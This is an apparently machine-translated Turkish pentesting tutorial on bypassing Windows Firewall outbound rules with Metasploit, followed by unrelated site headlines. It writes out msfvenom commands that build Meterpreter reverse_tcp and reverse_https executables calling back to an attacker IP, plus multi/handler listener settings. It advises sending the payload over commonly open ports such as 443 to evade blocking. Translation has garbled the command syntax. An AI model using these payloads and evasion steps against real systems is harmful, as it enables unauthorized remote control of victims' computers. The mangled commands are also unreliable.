Windows güvenlik duvarında giden kuralları atlamak için Metasploit nasıl kullanılır

Önceki güvenlik duvarı sızma testi makalelerinde, bilgisayar korsanlarının veya kötü amaçlı yazılımların bilgisayarınıza saldırmasını önlemek için ağdaki herhangi bir belirli bağlantı noktasına erişimi engellemek için bir güvenlik duvarının nasıl kullanılacağını okumuş olabilirsiniz. Bu makalenin amacı, bir saldırganın güvenlik duvarı kurallarını nasıl aşabileceğini ve kurbanın bilgisayarına yetkisiz erişime nasıl teşebbüs edebileceğini açıklamaktır.

Hedef: Windows PC

Saldırgan: Kali Linux

Hadi başlayalım! !

Güvenlik duvarı ayarlarına girmek için kontrol panelini açın ve ardından ekran görüntüsünde gösterildiği gibi güvenlik duvarı kurallarını yapılandırmak için gelişmiş ayarları seçin.

Saldırılara karşı koruma sağlamak için ağa bir güvenlik katmanı eklemek üzere güvenlik duvarına yeni kurallar yapılandırmak için Giden Kuralları'na gidin.

Oluşturulacak güvenlik duvarı kuralı türünü seçin, TCP ve UDP bağlantı noktası bağlantılarının seçeneklerini kontrol etmek için Bağlantı Noktası düğmesine ve ardından İleri'ye tıklayın.

Şimdi kuralın uygulanacağı protokolü ve bağlantı noktasını belirtin.TC'yi seçtim, ardından bu kuralın uygulanacağı bağlantı noktasını 4444 olarak belirledikten sonra İleri'ye tıklayın.

Bağlantı koşulları belirlediğim belirtilen koşullarla eşleştiğinde, bağlantıyı engellemeyi seçin.

Bu kuralı tüm senaryolara uygulamak için tüm onay kutularını seçin.

Kuralınızı burada adlandırın. Ekran görüntüsünde ona 4444 numaralı bağlantı noktasını bloke ettiğimi görebilir ve ardından Bitir'i tıklayabilirsiniz.

Burada, yeni giden kuralının giden kural listesine eklendiğini görebilirsiniz. Artık bu bilgisayar 4444 numaralı bağlantı noktasıyla bağlantı kurmak için herhangi bir saldırıya karşı savunma yapabilir, çünkü saldırganın 4444 numaralı bağlantı noktası üzerinden bağlantı kurmak için yaptığı tüm işlemler reddedilecektir.

Artık saldırgan 4444 numaralı bağlantı noktası üzerinden kötü amaçlı dosyalar gönderdiğinde giden kurallarımızın etkili olup olmadığını görmeye çalışıyoruz.

Burada msfvenom'u 4444.exe adlı exe formatında bir dosya oluşturmak için kullanıyorum ve ardından kurbana gönderiyorum ve arka planda başlatıyorum

msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.1.102 lport = 4444 -f exe > /root/Desktop/4444.exe

Kurbanın bilgisayarıyla bağlantı kurup kurmadığınızı görmek için

çoklu / işleyici kullan msf exploit (işleyici) > payload / meterpreter / reverse_tcp ayarla msf exploit (işleyici) > lhost 192.168.1.102 ayarla msf exploit (işleyici) > set lport 4444 msf exploit (işleyici) > istismar etmek

OOPS !! Yanıt yok

Bu, mağdur ile saldırgan arasında bir bağlantı kuramayacağımız anlamına gelir. Artık kurbanın 4444 numaralı bağlantı noktasındaki bağlantıyı başarıyla reddettiğini biliyoruz.

Bu tür bir kısıtlama ile karşılaştığınızda, saldırının amacı konusunda net olmalısınız? Kurbanın bilgisayarına saldırmanız ve bir bağlantı kurmanız gerekir.

Kötü amaçlı dosyalarınızı 80/443/445 gibi sık açık bağlantı noktaları üzerinden göndermeyi deneyebilirsiniz.

Bir saldırgan 443 numaralı bağlantı noktasını kullanarak kötü amaçlı bir dosya göndermeye çalıştığında, saldırgan kurbanın bilgisayarıyla bağlantı kurabilir mi?

msfvenom -p windows / meterpreter / reverse_https lhost = 192.168.1.102 lport = 443 -f exe > /root/Desktop/443.exe

443.exe'yi 443 numaralı bağlantı noktası üzerinden gönderin

çoklu / işleyici kullan msf exploit (işleyici) > yük pencerelerini ayarla / meterpreter / reverse_http msf exploit (işleyici) > lhost 192.168.1.102 ayarla msf exploit (işleyici) > lport 443 ayarla msf exploit (işleyici) > sömürmek

HARİKA!! Başarılı saldırı

Metasploit'i kurbanın bilgisayarının ölçüm cihazı oturumunu elde etmek için başarıyla kullandık

Özetle, saldırının başarısızlığı, diğer tarafın uyguladığı yama veya savunmasız bağlantı noktasına bağlantının engellenmesinden kaynaklanmayabilir.

* Kaynak: hackingarticles, MottoIN editörü tarafından derlenmiş ve yayınlanmıştır, lütfen MottoIN'den olduğunu belirtin

Orijinal makale, yazar: Jarry, http: //www.mottoin.com/article/system/98694.html adresinden yeniden üretilmiştir.

Toplam 220 milyon " Anne" maliyeti ile bir kişi tek başına 87 milyon aldı! Xu Zheng'in "İş Deneyimi": Yatırım getirisi, performanslardan elde edilen geliri çok aşabilir
önceki
Kralın ihtişamındaki "en hızlı" kahramanları sayın!
Sonraki
SAIC Volkswagen 2017 Santana Horner'ın genç, gerçek çekimlerine daha yakın
Game of Thrones'un sekizinci sezonu, son derece net birçok karakter posterini ortaya çıkarıyor! Long Ma Demir Taht'ta oturuyor!
Dikkatli olun, üniversiteye giriş sınavı dolandırıcılığına aldanmayın! Adayların velilerine hatırlatın
Sistem iznini ve hesabı ekleyemeyen kabuğu yükseltmek için metasploit (meterpreter) kullanın
Süper çalışan tasarım + dahili 4 fan! Nubia siyah teknoloji konseptli oyun telefonunu piyasaya sürdü
Tanıdık ama farklı bir zevkle
Kim daha güçlü, Diao Chan ve Luna?
Mart ayının ilk gününde Bai Baihe'ye mutlu yıllar!
Zhou Zongwei, Arizona Eyalet Üniversitesi: U-Net Çalışması Mevcut Segmentasyon Ağı İnovasyonu | AI Araştırma Enstitüsü 74 Konferans Salonu
Yeni bir mağaza açmak ve yeni bir telefon başlatmak: Xiaomi, MWC konferansına boşuna gitmedi
Yılın sonunda Büyük Şeytan olmalı! YEEZY BOOST 350 V2 "Mavi Ton" sürüm bilgisi açığa çıktı
2017 Volkswagen Lavida 180TSI'yi test etmek için her şey hazır
To Top